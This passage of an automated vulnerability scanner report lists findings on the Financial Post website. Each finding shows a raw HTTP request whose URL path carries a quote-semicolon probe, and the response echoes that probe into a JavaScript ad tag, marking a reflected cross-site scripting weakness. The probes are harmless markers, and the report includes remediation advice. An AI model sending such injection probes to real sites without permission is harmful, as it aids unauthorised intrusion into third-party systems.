P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43189


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/fp500f5c6d';fe08f537a24/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=fp500f5c6d';fe08f537a24;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=78333243?">
...[SNIP]...

1.167. http://www.financialpost.com/news/business-insider/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/business-insider/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ff81'%3b99734784d32 was submitted in the REST URL parameter 1. This input was echoed as 8ff81';99734784d32 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news8ff81'%3b99734784d32/business-insider/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37601


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news8ff81';99734784d32/business-insider/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news8ff81';99734784d32;kw=business-insider;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=20891770?">
...[SNIP]...

1.168. http://www.financialpost.com/news/business-insider/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/business-insider/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72d86'%3b8b9d58f9044 was submitted in the REST URL parameter 2. This input was echoed as 72d86';8b9d58f9044 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-insider72d86'%3b8b9d58f9044/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43410


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/business-insider72d86';8b9d58f9044/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=business-insider72d86';8b9d58f9044;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=25473940?">
...[SNIP]...

1.169. http://www.financialpost.com/news/business-insider/ways+nail+first+impression/3987967/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/business-insider/ways+nail+first+impression/3987967/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91d79'%3b8edda2a7d69 was submitted in the REST URL parameter 1. This input was echoed as 91d79';8edda2a7d69 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news91d79'%3b8edda2a7d69/business-insider/ways+nail+first+impression/3987967/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76139
Expires: Sun, 19 Dec 2010 03:10:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news91d79';8edda2a7d69/business-insider/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news91d79';8edda2a7d69;kw=business-insider;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=83631043?">
...[SNIP]...

1.170. http://www.financialpost.com/news/business-insider/ways+nail+first+impression/3987967/story.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/business-insider/ways+nail+first+impression/3987967/story.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e64d5'%3be02aad2f8d9 was submitted in the REST URL parameter 2. This input was echoed as e64d5';e02aad2f8d9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-insidere64d5'%3be02aad2f8d9/ways+nail+first+impression/3987967/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83435
Expires: Sun, 19 Dec 2010 03:10:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/business-insidere64d5';e02aad2f8d9/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=business-insidere64d5';e02aad2f8d9;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=30835417?">
...[SNIP]...

1.171. http://www.financialpost.com/news/business-insider/ways+nail+first+impression/3987967/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/business-insider/ways+nail+first+impression/3987967/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bf26'%3b4023866e636 was submitted in the REST URL parameter 4. This input was echoed as 7bf26';4023866e636 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-insider/ways+nail+first+impression/39879677bf26'%3b4023866e636/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78912
Expires: Sun, 19 Dec 2010 03:11:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/business-insider/ways-nail-first-impression/39879677bf26';4023866e636/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=business-insider;kw=ways-nail-first-impression;kw=39879677bf26';4023866e636;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surro
...[SNIP]...

1.172. http://www.financialpost.com/news/business-insider/ways+nail+first+impression/3987967/story.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/business-insider/ways+nail+first+impression/3987967/story.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7885c'%3b6d8892f2062 was submitted in the REST URL parameter 5. This input was echoed as 7885c';6d8892f2062 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-insider/ways+nail+first+impression/3987967/7885c'%3b6d8892f2062 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44327


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/business-insider/ways%20nail%20first%20impression/3987967/7885c';6d8892f2062/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=business-insider;kw=ways%20nail%20first%20impression;kw=3987967;kw=7885c';6d8892f2062;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcooki
...[SNIP]...

1.173. http://www.financialpost.com/news/economy/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/economy/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7cb9'%3b332834b26ae was submitted in the REST URL parameter 1. This input was echoed as c7cb9';332834b26ae in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /newsc7cb9'%3b332834b26ae/economy/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43266


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/newsc7cb9';332834b26ae/economy/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=newsc7cb9';332834b26ae;kw=economy;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=71562567?">
...[SNIP]...

1.174. http://www.financialpost.com/news/economy/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/economy/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23396'%3bcca2d7dd2c5 was submitted in the REST URL parameter 2. This input was echoed as 23396';cca2d7dd2c5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/economy23396'%3bcca2d7dd2c5/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43230


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/economy23396';cca2d7dd2c5/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=economy23396';cca2d7dd2c5;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=97048384?">
...[SNIP]...

1.175. http://www.financialpost.com/news/economy/Europe+North+America/3996015/story.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/economy/Europe+North+America/3996015/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2cfab'%3bb5657ebc138 was submitted in the REST URL parameter 1. This input was echoed as 2cfab';b5657ebc138 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news2cfab'%3bb5657ebc138/economy/Europe+North+America/3996015/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77584
Expires: Sun, 19 Dec 2010 03:10:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news2cfab';b5657ebc138/economy/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news2cfab';b5657ebc138;kw=economy;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=98496123?">
...[SNIP]...

1.176. http://www.financialpost.com/news/economy/Europe+North+America/3996015/story.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/economy/Europe+North+America/3996015/story.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4482'%3b595e9a6b3a0 was submitted in the REST URL parameter 2. This input was echoed as e4482';595e9a6b3a0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/economye4482'%3b595e9a6b3a0/Europe+North+America/3996015/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 90835
Expires: Sun, 19 Dec 2010 03:10:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/economye4482';595e9a6b3a0/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=economye4482';595e9a6b3a0;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=28719133?">
...[SNIP]...

1.177. http://www.financialpost.com/news/economy/Europe+North+America/3996015/story.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/economy/Europe+North+America/3996015/story.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e012'%3bed7a07312f0 was submitted in the REST URL parameter 4. This input was echoed as 2e012';ed7a07312f0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/economy/Europe+North+America/39960152e012'%3bed7a07312f0/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69569
Expires: Sun, 19 Dec 2010 03:10:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/economy/europe-north-america/39960152e012';ed7a07312f0/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=economy;kw=europe-north-america;kw=39960152e012';ed7a07312f0;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=160
...[SNIP]...

1.178. http://www.financialpost.com/news/economy/Europe+North+America/3996015/story.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/economy/Europe+North+America/3996015/story.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d6b5'%3b2734327df9e was submitted in the REST URL parameter 5. This input was echoed as 5d6b5';2734327df9e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/economy/Europe+North+America/3996015/5d6b5'%3b2734327df9e HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38125


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/economy/europe%20north%20america/3996015/5d6b5';2734327df9e/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=economy;kw=europe%20north%20america;kw=3996015;kw=5d6b5';2734327df9e;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+
...[SNIP]...

1.179. http://www.financialpost.com/news/energy/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/energy/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61908'%3b80f0b405c4b was submitted in the REST URL parameter 1. This input was echoed as 61908';80f0b405c4b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news61908'%3b80f0b405c4b/energy/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
